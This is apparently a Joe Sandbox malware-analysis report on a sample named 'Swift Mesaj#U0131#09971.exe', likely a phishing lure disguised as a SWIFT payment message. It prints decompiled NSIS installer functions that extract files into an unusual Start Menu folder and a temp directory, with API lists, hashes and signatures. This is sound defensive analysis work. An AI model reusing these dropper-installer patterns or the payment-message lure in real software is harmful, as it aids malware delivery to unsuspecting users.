Associated: 00000001.00000002.7934106113.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Swift Mesaj#U0131#09971.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: "C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 4283519449-3810846292
Opcode ID: 63e69acdaec1fdaba5d4a89e2a3b5318abe59b2b0843af0c7679ee6c60d0c948
Instruction ID: 5fb561c1f1da7fe65fe29aa304fda9dad36d264b5387f138e6185790fd874317
Opcode Fuzzy Hash: 63e69acdaec1fdaba5d4a89e2a3b5318abe59b2b0843af0c7679ee6c60d0c948
Instruction Fuzzy Hash: 18510471902216AFDB20AF64DD85B9E7EB8FB00359F15403BF904B62C5C7789E408B6C

Uniqueness

Uniqueness Score: -1.00%

Function 004062A4 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 209
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 72%

			E004062A4(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t43;
				WCHAR* _t44;
				signed char _t46;
				signed int _t47;
				signed int _t48;
				short _t58;
				short _t60;
				short _t62;
				void* _t70;
				signed int _t76;
				void* _t82;
				signed char _t83;
				short _t86;
				signed int _t96;
				void* _t102;
				short _t103;
				signed int _t106;
				signed int _t108;
				void* _t109;
				WCHAR* _t110;
				void* _t112;

				_t109 = __esi;
				_t102 = __edi;
				_t70 = __ebx;
				_t43 = _a8;
				if(_t43 < 0) {
					_t43 =  *( *0x433ebc - 4 + _t43 * 4);
				}
				_push(_t70);
				_push(_t109);
				_push(_t102);
				_t96 =  *0x434f38 + _t43 * 2;
				_t44 = 0x432e80;
				_t110 = 0x432e80;
				if(_a4 >= 0x432e80 && _a4 - 0x432e80 >> 1 < 0x800) {
					_t110 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t103 =  *_t96;
					if(_t103 == 0) {
						break;
					}
					__eflags = (_t110 - _t44 & 0xfffffffe) - 0x800;
					if((_t110 - _t44 & 0xfffffffe) >= 0x800) {
						break;
					}
					_t82 = 2;
					_t96 = _t96 + _t82;
					__eflags = _t103 - 4;
					_a8 = _t96;
					if(__eflags >= 0) {
						if(__eflags != 0) {
							 *_t110 = _t103;
							_t110 = _t110 + _t82;
							__eflags = _t110;
						} else {
							 *_t110 =  *_t96;
							_t110 = _t110 + _t82;
							_t96 = _t96 + _t82;
						}
						continue;
					}
					_t83 =  *((intOrPtr*)(_t96 + 1));
					_t46 =  *_t96;
					_t47 = _t46 & 0x000000ff;
					_v8 = (_t83 & 0x0000007f) << 0x00000007 | _t46 & 0x0000007f;
					_a8 = _a8 + 2;
					_v28 = _t47 | 0x00008000;
					_v24 = _t47;
					_t76 = _t83 & 0x000000ff;
					_v16 = _t76;
					__eflags = _t103 - 2;
					_v20 = _t76 | 0x00008000;
					if(_t103 != 2) {
						__eflags = _t103 - 3;
						if(_t103 != 3) {
							__eflags = _t103 - 1;
							if(_t103 == 1) {
								__eflags = (_t47 | 0xffffffff) - _v8;
								E004062A4(_t76, _t103, _t110, _t110, (_t47 | 0xffffffff) - _v8);
							}
							L43:
							_t48 = lstrlenW(_t110);
							_t96 = _a8;
							_t110 =  &(_t110[_t48]);
							_t44 = 0x432e80;
							continue;
						}
						_t106 = _v8;
						__eflags = _t106 - 0x1d;
						if(_t106 != 0x1d) {
							__eflags = (_t106 << 0xb) + 0x435000;
							E00406282(_t110, (_t106 << 0xb) + 0x435000);
						} else {
							E004061C9(_t110,  *0x434ee8);
						}
						__eflags = _t106 + 0xffffffeb - 7;
						if(_t106 + 0xffffffeb < 7) {
							L34:
							E00406516(_t110);
						}
						goto L43;
					}
					_t86 =  *0x434eec;
					__eflags = _t86;
					_t108 = 2;
					if(_t86 >= 0) {
						L13:
						_v8 = 1;
						L14:
						__eflags =  *0x434f84;
						if( *0x434f84 != 0) {
							_t108 = 4;
						}
						__eflags = _t47;
						if(__eflags >= 0) {
							__eflags = _t47 - 0x25;
							if(_t47 != 0x25) {
								__eflags = _t47 - 0x24;
								if(_t47 == 0x24) {
									GetWindowsDirectoryW(_t110, 0x400);
									_t108 = 0;
								}
								while(1) {
									__eflags = _t108;
									if(_t108 == 0) {
										goto L30;
									}
									_t58 =  *0x434ee4;
									_t108 = _t108 - 1;
									__eflags = _t58;
									if(_t58 == 0) {
										L26:
										_t60 = SHGetSpecialFolderLocation( *0x434ee8,  *(_t112 + _t108 * 4 - 0x18),  &_v12);
										__eflags = _t60;
										if(_t60 != 0) {
											L28:
											 *_t110 =  *_t110 & 0x00000000;
											__eflags =  *_t110;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v12, _t110);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t60;
										if(_t60 != 0) {
											goto L30;
										}
										goto L28;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L26;
									}
									_t62 =  *_t58( *0x434ee8,  *(_t112 + _t108 * 4 - 0x18), 0, 0, _t110); // executed
									__eflags = _t62;
									if(_t62 == 0) {
										goto L30;
									}
									goto L26;
								}
								goto L30;
							}
							GetSystemDirectoryW(_t110, 0x400);
							goto L30;
						} else {
							E00406150( *0x434f38, __eflags, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x434f38 + (_t47 & 0x0000003f) * 2, _t110, _t47 & 0x00000040); // executed
							__eflags =  *_t110;
							if( *_t110 != 0) {
								L32:
								__eflags = _t76 - 0x1a;
								if(_t76 == 0x1a) {
									lstrcatW(_t110, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L34;
							}
							E004062A4(_t76, _t108, _t110, _t110, _t76);
							L30:
							__eflags =  *_t110;
							if( *_t110 == 0) {
								goto L34;
							}
							_t76 = _v16;
							goto L32;
						}
					}
					__eflags = _t86 - 0x5a04;
					if(_t86 == 0x5a04) {
						goto L13;
					}
					__eflags = _t76 - 0x23;
					if(_t76 == 0x23) {
						goto L13;
					}
					__eflags = _t76 - 0x2e;
					if(_t76 == 0x2e) {
						goto L13;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L14;
					}
				}
				 *_t110 =  *_t110 & 0x00000000;
				if(_a4 == 0) {
					return _t44;
				}
				return E00406282(_a4, _t44);
			}

0x004062a4
0x004062a4
0x004062a4
0x004062aa
0x004062af
0x004062c0
0x004062c0
0x004062c8
0x004062c9
0x004062ca
0x004062cb
0x004062ce
0x004062d6
0x004062d8
0x004062f1
0x004062f4
0x004062f4
0x004064f0
0x004064f0
0x004064f6
0x00000000
0x00000000
0x00406304
0x0040630a
0x00000000
0x00000000
0x00406312
0x00406313
0x00406315
0x00406319
0x0040631c
0x004064dd
0x004064eb
0x004064ee
0x004064ee
0x004064df
0x004064e2
0x004064e5
0x004064e7
0x004064e7
0x00000000
0x004064dd
0x00406322
0x00406325
0x00406334
0x0040633b
0x00406345
0x00406349
0x0040634c
0x0040634f
0x00406354
0x00406359
0x0040635d
0x00406360
0x00406480
0x00406484
0x004064b7
0x004064bb
0x004064c0
0x004064c5
0x004064c5
0x004064ca
0x004064cb
0x004064d0
0x004064d3
0x004064d6
0x00000000
0x004064d6
0x00406486
0x00406489
0x0040648c
0x004064a1
0x004064a8
0x0040648e
0x00406495
0x00406495
0x004064b0
0x004064b3
0x00406478
0x00406479
0x00406479
0x00000000
0x004064b3
0x00406366
0x0040636e
0x00406370
0x00406371
0x0040638a
0x0040638a
0x00406391
0x00406391
0x00406398
0x0040639c
0x0040639c
0x0040639d
0x0040639f
0x004063da
0x004063dd
0x004063ed
0x004063f0
0x004063f8
0x004063fe
0x004063fe
0x0040645b
0x0040645b
0x0040645d
0x00000000
0x00000000
0x00406402
0x00406409
0x0040640a
0x0040640c
0x00406426
0x00406434
0x0040643a
0x0040643c
0x00406457
0x00406457
0x00406457
0x00000000
0x00406457
0x00406442
0x0040644d
0x00406453
0x00406455
0x00000000
0x00000000
0x00000000
0x00406455
0x0040640e
0x00406411
0x00000000
0x00000000
0x00406420
0x00406422
0x00406424
0x00000000
0x00000000
0x00000000
0x00406424
0x00000000
0x0040645b
0x004063e5
0x00000000
0x004063a1
0x004063bf
0x004063c4
0x004063c8
0x00406468
0x00406468
0x0040646b
0x00406473
0x00406473
0x00000000
0x0040646b
0x004063d0
0x0040645f
0x0040645f
0x00406463
0x00000000
0x00000000
0x00406465
0x00000000
0x00406465
0x0040639f
0x00406373
0x00406378
0x00000000
0x00000000
0x0040637a
0x0040637d
0x00000000
0x00000000
0x0040637f
0x00406382
0x00000000
0x00406384
0x00406384
0x00000000
0x00406384
0x00406382
0x004064fc
0x00406507
0x00406513
0x00406513
0x00000000

APIs

GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004063E5
GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,0042C228,?,0040531D,0042C228,00000000), ref: 004063F8
SHGetSpecialFolderLocation.SHELL32(0040531D,0041D800,00000000,0042C228,?,0040531D,0042C228,00000000), ref: 00406434
SHGetPathFromIDListW.SHELL32(0041D800,Call), ref: 00406442
CoTaskMemFree.OLE32(0041D800), ref: 0040644D
lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406473
lstrlenW.KERNEL32(Call,00000000,0042C228,?,0040531D,0042C228,00000000), ref: 004064CB

Strings

Call, xrefs: 004062CE, 004063A9, 004063B0, 004063B4, 004063CE, 004063CF, 004063E4, 004063F7, 00406413, 0040643E, 00406472, 00406478, 00406494, 004064A7, 004064C4, 004064CA, 004064D6, 00406509
Software\Microsoft\Windows\CurrentVersion, xrefs: 004063B5
\Microsoft\Internet Explorer\Quick Launch, xrefs: 0040646D

Memory Dump Source

Source File: 00000001.00000002.7933520080.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.7933489483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933579925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933613900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933829998.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933863380.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933904091.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933934364.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933968615.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934029306.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934066899.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934106113.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Swift Mesaj#U0131#09971.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 717251189-1230650788
Opcode ID: 5757adc76ebd299de9e3f21c9246a654aa3bace2b5e710508428971d5ba8c1fc
Instruction ID: 2bc9f3e321a063d065e255e84c3e845f89f4622f689527909a28eedc1d3cb15f
Opcode Fuzzy Hash: 5757adc76ebd299de9e3f21c9246a654aa3bace2b5e710508428971d5ba8c1fc
Instruction Fuzzy Hash: 1D613631A00205ABDF209F64CD41ABE37A5AF44318F16813FE947B62D1D77C5AA1CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 61%

			E0040176F(FILETIME* __ebx, void* __eflags) {
				void* __edi;
				void* _t35;
				void* _t43;
				void* _t45;
				FILETIME* _t51;
				FILETIME* _t64;
				void* _t66;
				signed int _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				void* _t81;
				void* _t82;
				WCHAR* _t84;
				void* _t86;

				_t77 = __ebx;
				 *(_t86 - 8) = E00402C37(0x31);
				 *(_t86 + 8) =  *(_t86 - 0x28) & 0x00000007;
				_t35 = E00405BCA( *(_t86 - 8));
				_push( *(_t86 - 8));
				_t84 = L"Call";
				if(_t35 == 0) {
					lstrcatW(E00405B53(E00406282(_t84, L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Ydervgg\\Superassume\\dodecaheddra\\Novelizes")), ??);
				} else {
					E00406282();
				}
				E00406516(_t84);
				while(1) {
					__eflags =  *(_t86 + 8) - 3;
					if( *(_t86 + 8) >= 3) {
						_t66 = E004065C5(_t84);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t86 - 0x1c);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t86 + 8) = _t72;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) == _t77) {
						E00405D4F(_t84);
					}
					__eflags =  *(_t86 + 8) - 1;
					_t43 = E00405D74(_t84, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
					__eflags = _t43 - 0xffffffff;
					 *(_t86 - 0x30) = _t43;
					if(_t43 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) != _t77) {
						E004052E6(0xffffffe2,  *(_t86 - 8));
						__eflags =  *(_t86 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t86 - 4)) = 1;
						}
						L31:
						 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t86 - 4));
						__eflags =  *0x434f88;
						goto L32;
					} else {
						E00406282("C:\Users\Arthur\AppData\Local\Temp\nsjFA0C.tmp", _t81);
						E00406282(_t81, _t84);
						E004062A4(_t77, _t81, _t84, "C:\Users\Arthur\AppData\Local\Temp\nsjFA0C.tmp\System.dll",  *((intOrPtr*)(_t86 - 0x14)));
						E00406282(_t81, "C:\Users\Arthur\AppData\Local\Temp\nsjFA0C.tmp");
						_t64 = E004058E4("C:\Users\Arthur\AppData\Local\Temp\nsjFA0C.tmp\System.dll",  *(_t86 - 0x28) >> 3) - 4;
						__eflags = _t64;
						if(_t64 == 0) {
							continue;
						} else {
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								 *0x434f88 =  &( *0x434f88->dwLowDateTime);
								L32:
								_t51 = 0;
								__eflags = 0;
							} else {
								_push(_t84);
								_push(0xfffffffa);
								E004052E6();
								L29:
								_t51 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t51;
				}
				E004052E6(0xffffffea,  *(_t86 - 8));
				 *0x434fb4 =  *0x434fb4 + 1;
				_push(_t77);
				_push(_t77);
				_push( *(_t86 - 0x30));
				_push( *((intOrPtr*)(_t86 - 0x20)));
				_t45 = E004030FA(); // executed
				 *0x434fb4 =  *0x434fb4 - 1;
				__eflags =  *(_t86 - 0x1c) - 0xffffffff;
				_t82 = _t45;
				if( *(_t86 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t86 - 0x30), _t86 - 0x1c, _t77, _t86 - 0x1c); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t86 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t86 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				CloseHandle( *(_t86 - 0x30)); // executed
				__eflags = _t82 - _t77;
				if(_t82 >= _t77) {
					goto L31;
				} else {
					__eflags = _t82 - 0xfffffffe;
					if(_t82 != 0xfffffffe) {
						E004062A4(_t77, _t82, _t84, _t84, 0xffffffee);
					} else {
						E004062A4(_t77, _t82, _t84, _t84, 0xffffffe9);
						lstrcatW(_t84,  *(_t86 - 8));
					}
					_push(0x200010);
					_push(_t84);
					E004058E4();
					goto L29;
				}
				goto L33;
			}

0x0040176f
0x00401776
0x00401782
0x00401785
0x0040178a
0x0040178d
0x00401794
0x004017b0
0x00401796
0x00401797
0x00401797
0x004017b6
0x004017bb
0x004017bb
0x004017bf
0x004017c2
0x004017c7
0x004017c9
0x004017cb
0x004017d0
0x004017d0
0x004017db
0x004017db
0x004017ec
0x004017ee
0x004017ee
0x004017ef
0x004017ef
0x004017f2
0x004017f5
0x004017f8
0x004017f8
0x004017ff
0x0040180e
0x00401813
0x00401816
0x00401819
0x00000000
0x00000000
0x0040181b
0x0040181e
0x00401874
0x00401879
0x004015b6
0x00402885
0x00402885
0x00402abf
0x00402ac2
0x00402ac2
0x00000000
0x00401820
0x00401826
0x0040182d
0x0040183a
0x00401845
0x0040185b
0x0040185b
0x0040185e
0x00000000
0x00401864
0x00401864
0x00401865
0x00401882
0x00402ac8
0x00402ac8
0x00402ac8
0x00401867
0x00401867
0x00401868
0x00401493
0x004022f1
0x004022f1
0x004022f1
0x00401865
0x0040185e
0x00402aca
0x00402ace
0x00402ace
0x00401892
0x00401897
0x0040189d
0x0040189e
0x0040189f
0x004018a2
0x004018a5
0x004018aa
0x004018b0
0x004018b4
0x004018b6
0x004018be
0x004018ca
0x004018b8
0x004018b8
0x004018bc
0x00000000
0x00000000
0x004018bc
0x004018d3
0x004018d9
0x004018db
0x00000000
0x004018e1
0x004018e1
0x004018e4
0x004018fc
0x004018e6
0x004018e9
0x004018f2
0x004018f2
0x00401901
0x00401906
0x004022ec
0x00000000
0x004022ec
0x00000000

APIs

lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\Novelizes,?,?,00000031), ref: 004017D5

Part of subcall function 00406282: lstrcpynW.KERNEL32(?,?,00000400,00403444,00433EE0,NSIS Error,?,00000006,00000008,0000000A), ref: 0040628F

Part of subcall function 004052E6: lstrlenW.KERNEL32(0042C228,00000000,0041D800,762023A0,?,?,?,?,?,?,?,?,?,0040325E,00000000,?), ref: 0040531E
Part of subcall function 004052E6: lstrlenW.KERNEL32(0040325E,0042C228,00000000,0041D800,762023A0,?,?,?,?,?,?,?,?,?,0040325E,00000000), ref: 0040532E
Part of subcall function 004052E6: lstrcatW.KERNEL32(0042C228,0040325E), ref: 00405341
Part of subcall function 004052E6: SetWindowTextW.USER32(0042C228,0042C228), ref: 00405353
Part of subcall function 004052E6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405379
Part of subcall function 004052E6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405393
Part of subcall function 004052E6: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A1

Strings

C:\Users\user\AppData\Local\Temp\nsjFA0C.tmp, xrefs: 00401821, 0040183F
C:\Users\user\AppData\Local\Temp\nsjFA0C.tmp\System.dll, xrefs: 00401835, 00401851
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\Novelizes, xrefs: 0040179E
Call, xrefs: 0040178D, 00401796, 004017A3, 004017B5, 004017C1, 004017F7, 0040180D, 0040182B, 00401867, 004018E8, 004018F1, 004018FB, 00401906

Memory Dump Source

Source File: 00000001.00000002.7933520080.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.7933489483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933579925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933613900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933829998.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933863380.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933904091.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933934364.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933968615.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934029306.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934066899.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934106113.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Swift Mesaj#U0131#09971.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp\nsjFA0C.tmp$C:\Users\user\AppData\Local\Temp\nsjFA0C.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\Novelizes$Call
API String ID: 1941528284-491631011
Opcode ID: 5b350da25249687dd4719405322e9856b363981bc1dd38a50fc9a6532880dae0
Instruction ID: 71989b97474780e21d9e3883d12846d469cfbdfaa42366440e3466e884ca0043
Opcode Fuzzy Hash: 5b350da25249687dd4719405322e9856b363981bc1dd38a50fc9a6532880dae0
Instruction Fuzzy Hash: C1419431900518BECF11BBA5DC46DAF3679EF45328F20423FF412B50E1DA3C8A519A6D

Uniqueness

Uniqueness Score: -1.00%

Function 004030FA Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 166
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E004030FA(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
				signed int _v8;
				int _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				short _v152;
				void* _t65;
				void* _t69;
				long _t70;
				intOrPtr _t75;
				long _t76;
				intOrPtr _t77;
				void* _t78;
				int _t88;
				intOrPtr _t92;
				intOrPtr _t95;
				long _t96;
				signed int _t97;
				int _t98;
				int _t99;
				intOrPtr _t100;
				void* _t101;
				void* _t102;

				_t97 = _a16;
				_t92 = _a12;
				_v12 = _t97;
				if(_t92 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_v16 = _t92;
				if(_t92 == 0) {
					_v16 = 0x41aa00;
				}
				_t62 = _a4;
				if(_a4 >= 0) {
					E0040332B( *0x434f58 + _t62);
				}
				if(E00403315( &_a16, 4) == 0) {
					L41:
					_push(0xfffffffd);
					goto L42;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t92 != 0) {
							if(_a16 < _t97) {
								_t97 = _a16;
							}
							if(E00403315(_t92, _t97) != 0) {
								_v8 = _t97;
								L44:
								return _v8;
							} else {
								goto L41;
							}
						}
						if(_a16 <= _t92) {
							goto L44;
						}
						_t88 = _v12;
						while(1) {
							_t98 = _a16;
							if(_a16 >= _t88) {
								_t98 = _t88;
							}
							if(E00403315(0x416a00, _t98) == 0) {
								goto L41;
							}
							_t69 = E00405E26(_a8, 0x416a00, _t98); // executed
							if(_t69 == 0) {
								L28:
								_push(0xfffffffe);
								L42:
								_pop(_t65);
								return _t65;
							}
							_v8 = _v8 + _t98;
							_a16 = _a16 - _t98;
							if(_a16 > 0) {
								continue;
							}
							goto L44;
						}
						goto L41;
					}
					_t70 = GetTickCount();
					 *0x40d364 =  *0x40d364 & 0x00000000;
					 *0x40d360 =  *0x40d360 & 0x00000000;
					_t14 =  &_a16;
					 *_t14 = _a16 & 0x7fffffff;
					_v20 = _t70;
					 *0x40ce48 = 8;
					 *0x4169f0 = 0x40e9e8;
					 *0x4169ec = 0x40e9e8;
					 *0x4169e8 = 0x4169e8;
					_a4 = _a16;
					if( *_t14 <= 0) {
						goto L44;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t99 = 0x4000;
						if(_a16 < 0x4000) {
							_t99 = _a16;
						}
						if(E00403315(0x416a00, _t99) == 0) {
							goto L41;
						}
						_a16 = _a16 - _t99;
						 *0x40ce38 = 0x416a00;
						 *0x40ce3c = _t99;
						while(1) {
							_t95 = _v16;
							 *0x40ce40 = _t95;
							 *0x40ce44 = _v12;
							_t75 = E004067BD(0x40ce38);
							_v24 = _t75;
							if(_t75 < 0) {
								break;
							}
							_t100 =  *0x40ce40; // 0x41d800
							_t101 = _t100 - _t95;
							_t76 = GetTickCount();
							_t96 = _t76;
							if(( *0x434fb4 & 0x00000001) != 0 && (_t76 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfW( &_v152, L"... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t102 = _t102 + 0xc;
								E004052E6(0,  &_v152);
								_v20 = _t96;
							}
							if(_t101 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L44;
							} else {
								if(_a12 != 0) {
									_t77 =  *0x40ce40; // 0x41d800
									_v8 = _v8 + _t101;
									_v12 = _v12 - _t101;
									_v16 = _t77;
									L23:
									if(_v24 != 1) {
										continue;
									}
									goto L44;
								}
								_t78 = E00405E26(_a8, _v16, _t101); // executed
								if(_t78 == 0) {
									goto L28;
								}
								_v8 = _v8 + _t101;
								goto L23;
							}
						}
						_push(0xfffffffc);
						goto L42;
					}
					goto L41;
				}
			}

0x00403105
0x00403109
0x0040310c
0x00403111
0x00403113
0x00403113
0x0040311a
0x0040311e
0x00403123
0x00403125
0x00403125
0x0040312c
0x00403131
0x0040313c
0x0040313c
0x0040314e
0x00403303
0x00403303
0x00000000
0x00403154
0x00403158
0x004032b0
0x004032f3
0x004032f5
0x004032f5
0x00403301
0x00403308
0x0040330b
0x00000000
0x00000000
0x00000000
0x00000000
0x00403301
0x004032b5
0x00000000
0x00000000
0x004032b7
0x004032ba
0x004032bd
0x004032c0
0x004032c2
0x004032c2
0x004032d2
0x00000000
0x00000000
0x004032d9
0x004032e0
0x004032aa
0x004032aa
0x00403305
0x00403305
0x00000000
0x00403305
0x004032e2
0x004032e5
0x004032ec
0x00000000
0x00000000
0x00000000
0x004032ee
0x00000000
0x004032ba
0x00403164
0x00403166
0x0040316d
0x00403174
0x00403174
0x0040317b
0x00403183
0x0040318d
0x00403192
0x0040319a
0x004031a4
0x004031a7
0x00000000
0x00000000
0x00000000
0x00000000
0x004031ad
0x004031ad
0x004031ad
0x004031b5
0x004031b7
0x004031b7
0x004031c8
0x00000000
0x00000000
0x004031ce
0x004031d1
0x004031d7
0x004031dd
0x004031dd
0x004031e8
0x004031ee
0x004031f3
0x004031fa
0x004031fd
0x00000000
0x00000000
0x00403203
0x00403209
0x0040320b
0x00403214
0x00403216
0x00403247
0x0040324d
0x00403259
0x0040325e
0x0040325e
0x00403263
0x0040329e
0x00000000
0x00000000
0x00000000
0x00403265
0x00403269
0x00403280
0x00403285
0x00403288
0x0040328b
0x0040328e
0x00403292
0x00000000
0x00000000
0x00000000
0x00403298
0x00403272
0x00403279
0x00000000
0x00000000
0x0040327b
0x00000000
0x0040327b
0x00403263
0x004032a6
0x00000000
0x004032a6
0x00000000
0x004031ad

APIs

GetTickCount.KERNEL32 ref: 00403164
GetTickCount.KERNEL32 ref: 0040320B
MulDiv.KERNEL32(7FFFFFFF,00000064,00000000), ref: 00403234
wsprintfW.USER32 ref: 00403247

Strings

... %d%%, xrefs: 00403241
@, xrefs: 0040317E

Memory Dump Source

Source File: 00000001.00000002.7933520080.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.7933489483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933579925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933613900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933829998.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933863380.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933904091.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933934364.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933968615.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934029306.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934066899.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934106113.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Swift Mesaj#U0131#09971.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: ... %d%%$@
API String ID: 551687249-3859443358
Opcode ID: bcadc4b8fcc5a9726af7f1001a2bc5a9f2fe7a461361550fb019878be66ece88
Instruction ID: f75c430432033e5046526aed0a4a2f939c591a2e87bafbbe4e5c1659d7ec9983
